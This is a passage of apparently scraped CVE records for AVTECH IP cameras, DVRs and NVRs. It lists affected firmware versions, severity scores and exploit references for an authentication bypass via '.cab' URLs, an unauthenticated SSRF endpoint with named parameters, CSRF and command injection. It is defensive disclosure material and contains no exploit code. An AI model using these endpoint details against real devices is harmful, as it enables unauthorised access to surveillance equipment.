"status": "affected",
"version": "1051-1027-1035-1008"
},
{
"status": "affected",
"version": "1051CZ-1028-1037-1008"
},
{
"status": "affected",
"version": "1052-1027-1034-1008"
},
{
"status": "affected",
"version": "1052-1028-1038-1008"
},
{
"status": "affected",
"version": "1052A-1028-1038A-1008"
},
{
"status": "affected",
"version": "1054-1027-1036-1008"
},
{
"status": "affected",
"version": "1054-1028-1036-1008"
},
{
"status": "affected",
"version": "1055-1028-1036-1008"
},
{
"status": "affected",
"version": "1056-1028-1037-1008"
},
{
"status": "affected",
"version": "1058-1028-1039-1008"
},
{
"status": "affected",
"version": "1062-1028-1041-1008"
},
{
"status": "affected",
"version": "1065-1029-1043-1008"
},
{
"status": "affected",
"version": "1068-1029-1043-1008"
},
{
"status": "affected",
"version": "1069-1029-1043-1008"
},
{
"status": "affected",
"version": "1071-1029-1044-1008"
},
{
"status": "affected",
"version": "1077-1017-1035-1007"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-A6"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-D4"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-D705FF"
},
{
"status": "affected",
"version": "1078-1017-1036-1007"
},
{
"status": "affected",
"version": "1078-1017-1036-1007-A6"
},
{
"status": "affected",
"version": "1078-1017-1036-1007-D707FF"
},
{
"status": "affected",
"version": "1079-1017-1037-1007"
},
{
"status": "affected",
"version": "1079-1017-1037-1007-D4"
},
{
"status": "affected",
"version": "1W77-1W17-1W35-1W07-A6"
},
{
"status": "affected",
"version": "A077-1017-A035-1007"
},
{
"status": "affected",
"version": "A077-1017-A035-1007-A6"
},
{
"status": "affected",
"version": "A1035-1024-A1025-1008"
},
{
"status": "affected",
"version": "A1038-1025-A1028-1008-D4"
},
{
"status": "affected",
"version": "S681-S681-S681-S681"
},
{
"status": "affected",
"version": "S749-S749-S749-S749"
},
{
"status": "affected",
"version": "S818-S818-S818-S818"
},
{
"status": "affected",
"version": "S820-S820-S820-S820"
},
{
"status": "affected",
"version": "S823-S823-S823-S823"
},
{
"status": "affected",
"version": "S914V-S914V-S914V-S914V"
},
{
"status": "affected",
"version": "S984-S984-S984-S984"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function is used to identify \".cab\" requests, allowing any URL containing \".cab\" to bypass authentication and access protected endpoints."
}
],
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function is used to identify \".cab\" requests, allowing any URL containing \".cab\" to bypass authentication and access protected endpoints."
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115 Authentication Bypass"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290 Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:15.581Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via .cab Path Manipulation",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34053",
"datePublished": "2025-07-01T14:45:02.858Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:15.581Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34052 (GCVE-0-2025-34052)
Vulnerability from nvd – Published: 2025-07-01 14:44 – Updated: 2025-10-09 15:06
VLAI
An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2025-10-09T15:06:37.810Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"rejectedReasons": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery."
}
],
"value": "An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34052",
"datePublished": "2025-07-01T14:44:40.785Z",
"dateRejected": "2025-10-09T15:03:04.389Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2025-10-09T15:06:37.810Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-34051 (GCVE-0-2025-34051)
Vulnerability from nvd – Published: 2025-07-01 14:44 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH DVR Devices Server-Side Request Forgery
Summary
A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the /cgi-bin/nobody/Search.cgi?action=cgi_query endpoint without authentication. An attacker can manipulate the ip, port, and queryb64str parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | DVR devices |
Affected:
1001-1000-1000-1000
Affected: 1001-1000-1001-1001 Affected: 1002-1000-1002-1001 Unaffected: 1002-1001-1000-1000 Affected: 1002-1001-1001-1001 Affected: 1004-1002-1001-1000 Affected: 1004-1002-1003-1000-FFFF Affected: 1004V-1002V-1003V-1001V Affected: 1004Y-1002Y-1001EJ-1000Y Affected: 1004Y-1002Y-1001Y-1000Y Affected: 1005-1002-1002-1000 Affected: 1005-1002-1004-1001 Affected: 1006-1001-1003-1004 Affected: 1006-1002-1003-1000 Affected: 1006Y-1002Y-1003Y-1000Y Affected: 1007-1002-1004-1000 Affected: 1007-1003-1003-1002 Affected: 1007-1003-1005-1001 Affected: 1007E-1003E-1005EJ-1001E Affected: 1007V-1003V-1005V-1001V Affected: 1007Y-1002Y-1004Y-1000Y Affected: 1008-1002-1005-1000 Affected: 1008-1004-1003-1002 Affected: 1009-1003-1005-1006 Affected: 1009-1003-1006-1001 Affected: 1009-1007-1007-1000-FFFF Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1004-1007-1001 Affected: 1010-1005-1005-1002 Affected: 1011-1004-1005-1006 Affected: 1011-1005-1007-1001 Affected: 1011-1005-1007EJ-1001 Affected: 1011-1005-1008-1002 Affected: 1012-1004-1005-1006 Affected: 1012-1005-1007-1002 Affected: 1012-1006-1007-1001 Affected: 1012-1008-1009-1000-FFFF Affected: 1014-1005-1009-1002 Affected: 1014-1007-1009-1001 Affected: 1014-1010-1010-1000-FFFF Affected: 1014Y-1007Y-1009Y-1001Y Affected: 1015-1006-1010-1003 Affected: 1015-1007-1007-1007 Affected: 1015-1007-1010-1001 Affected: 1015-1010-1011-1000-FFFF Affected: 1015Y-1007Y-1010Y-1001Y Affected: 1016-1007-1005-1001 Affected: 1016-1007-1011-1001 Affected: 1016-1007-1011-1003 Affected: 1016-1008-1007-1007 Affected: 1016Y-1007Y-1011Y-1001Y Affected: 1017-1008-1012-1002 Affected: 1017-1009-1008-1008 Affected: 1017-1011-1013-1001-FFFF Affected: 1017f-1011f-1013f-1001f-FFFF Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1008-1012-1004 Affected: 1019-1009-1013-1003 Affected: 1019-1010-1009-1009 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1021-1011-1010-1009 Affected: 1022-1012-1011-1009 Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1013-1011-1009 Affected: 1023-1014-1017-1002-FFFF Affected: 1025-1014-1013-1009 Affected: 1026-1014-1014-1009 Affected: 1027-1014-1015-1009 Affected: S968-S968-S968-S968 Affected: V171P-V171P-V171P-V171P Affected: V189-V189-V189-V189 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34051",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T14:57:37.177556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T14:59:04.311Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi endpoint",
"ip parameter",
"port parameter",
"queryb64str parameter"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1000-1001-1001"
},
{
"status": "affected",
"version": "1002-1000-1002-1001"
},
{
"status": "unaffected",
"version": "1002-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1002-1003-1000-FFFF"
},
{
"status": "affected",
"version": "1004V-1002V-1003V-1001V"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001EJ-1000Y"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001Y-1000Y"
},
{
"status": "affected",
"version": "1005-1002-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1004-1001"
},
{
"status": "affected",
"version": "1006-1001-1003-1004"
},
{
"status": "affected",
"version": "1006-1002-1003-1000"
},
{
"status": "affected",
"version": "1006Y-1002Y-1003Y-1000Y"
},
{
"status": "affected",
"version": "1007-1002-1004-1000"
},
{
"status": "affected",
"version": "1007-1003-1003-1002"
},
{
"status": "affected",
"version": "1007-1003-1005-1001"
},
{
"status": "affected",
"version": "1007E-1003E-1005EJ-1001E"
},
{
"status": "affected",
"version": "1007V-1003V-1005V-1001V"
},
{
"status": "affected",
"version": "1007Y-1002Y-1004Y-1000Y"
},
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1008-1004-1003-1002"
},
{
"status": "affected",
"version": "1009-1003-1005-1006"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009-1007-1007-1000-FFFF"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010-1005-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1006"
},
{
"status": "affected",
"version": "1011-1005-1007-1001"
},
{
"status": "affected",
"version": "1011-1005-1007EJ-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1012-1004-1005-1006"
},
{
"status": "affected",
"version": "1012-1005-1007-1002"
},
{
"status": "affected",
"version": "1012-1006-1007-1001"
},
{
"status": "affected",
"version": "1012-1008-1009-1000-FFFF"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1014-1007-1009-1001"
},
{
"status": "affected",
"version": "1014-1010-1010-1000-FFFF"
},
{
"status": "affected",
"version": "1014Y-1007Y-1009Y-1001Y"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1015-1007-1007-1007"
},
{
"status": "affected",
"version": "1015-1007-1010-1001"
},
{
"status": "affected",
"version": "1015-1010-1011-1000-FFFF"
},
{
"status": "affected",
"version": "1015Y-1007Y-1010Y-1001Y"
},
{
"status": "affected",
"version": "1016-1007-1005-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1016-1008-1007-1007"
},
{
"status": "affected",
"version": "1016Y-1007Y-1011Y-1001Y"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017-1009-1008-1008"
},
{
"status": "affected",
"version": "1017-1011-1013-1001-FFFF"
},
{
"status": "affected",
"version": "1017f-1011f-1013f-1001f-FFFF"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019-1010-1009-1009"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1021-1011-1010-1009"
},
{
"status": "affected",
"version": "1022-1012-1011-1009"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1013-1011-1009"
},
{
"status": "affected",
"version": "1023-1014-1017-1002-FFFF"
},
{
"status": "affected",
"version": "1025-1014-1013-1009"
},
{
"status": "affected",
"version": "1026-1014-1014-1009"
},
{
"status": "affected",
"version": "1027-1014-1015-1009"
},
{
"status": "affected",
"version": "S968-S968-S968-S968"
},
{
"status": "affected",
"version": "V171P-V171P-V171P-V171P"
},
{
"status": "affected",
"version": "V189-V189-V189-V189"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the \u003ccode\u003e/cgi-bin/nobody/Search.cgi?action=cgi_query\u003c/code\u003e endpoint without authentication. An attacker can manipulate the \u003ccode\u003eip\u003c/code\u003e, \u003ccode\u003eport\u003c/code\u003e, and \u003ccode\u003equeryb64str\u003c/code\u003e parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services."
}
],
"value": "A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the /cgi-bin/nobody/Search.cgi?action=cgi_query endpoint without authentication. An attacker can manipulate the ip, port, and queryb64str parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services."
}
],
"impacts": [
{
"capecId": "CAPEC-664",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-664 Server Side Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "LOW",
"subConfidentialityImpact": "LOW",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:14.685Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH DVR Devices Server-Side Request Forgery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34051",
"datePublished": "2025-07-01T14:44:22.913Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:14.685Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34050 (GCVE-0-2025-34050)
Vulnerability from nvd – Published: 2025-07-01 14:42 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP Camera, DVR, and NVR Devices Cross-Site Request Forgery
Summary
A cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user’s browser session, allow unauthorized changes to the device configuration without user interaction.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-352 - Cross-Site Request Forgery (CSRF)
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP cameras |
Affected:
0
|
|
| AVTECH | DVR devices |
Affected:
0
|
|
| AVTECH | NVR devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34050",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:44:55.395830Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:45:06.703Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "IP cameras",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Web Management Interface (configuration endpoints)"
],
"product": "NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "A\u0026nbsp;cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user\u2019s browser session, allow unauthorized changes to the device configuration without user interaction."
}
],
"value": "A\u00a0cross-site request forgery (CSRF) vulnerability exists in the web interface of AVTECH IP camera, DVR, and NVR devices. An attacker can craft malicious requests that, when executed in the context of an authenticated user\u2019s browser session, allow unauthorized changes to the device configuration without user interaction."
}
],
"impacts": [
{
"capecId": "CAPEC-62",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-62 Cross Site Request Forgery"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-352",
"description": "CWE-352 Cross-Site Request Forgery (CSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:13.996Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP Camera, DVR, and NVR Devices Cross-Site Request Forgery",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34050",
"datePublished": "2025-07-01T14:42:57.143Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:13.996Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-7029 (GCVE-0-2024-7029)
Vulnerability from nvd – Published: 2024-08-02 15:08 – Updated: 2025-01-09 19:22
VLAI
KEVIntel
Title
Command Injection in AVTech AVM1203 (IP Camera)
Summary
Commands can be injected over the network and executed without authentication.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://www.cisa.gov/news-events/ics-advisories/i… | government-resource |
| https://www.akamai.com/blog/security-research/202… |
Impacted products
2 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTech | AVM1203 (IP Camera) |
Affected:
0 , ≤ FullImg-1023-1007-1011-1009
(custom)
|
|
| avtec | avm1203\/ipcamera\/ |
Affected:
0 , ≤ fullImg-1023-1007-1011-1009
(custom)
cpe:2.3:a:avtec:avm1203\/ipcamera\/:*:*:*:*:*:*:*:* |
Credits
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:avtec:avm1203\\/ipcamera\\/:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "avm1203\\/ipcamera\\/",
"vendor": "avtec",
"versions": [
{
"lessThanOrEqual": "fullImg-1023-1007-1011-1009",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-7029",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-05T15:18:01.228848Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-09T19:22:30.663Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "AVM1203 (IP Camera)",
"vendor": "AVTech",
"versions": [
{
"lessThanOrEqual": "FullImg-1023-1007-1011-1009",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Larry Cashdollar and Aline Eliovich of Akamai Technologies reported this vulnerability to CISA."
},
{
"lang": "en",
"type": "finder",
"value": "An anonymous third-party organization confirmed Akamai\u0027s report and identified specific affected products and firmware versions."
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eCommands can be injected over the network and executed without authentication.\u003c/span\u003e"
}
],
"value": "Commands can be injected over the network and executed without authentication."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
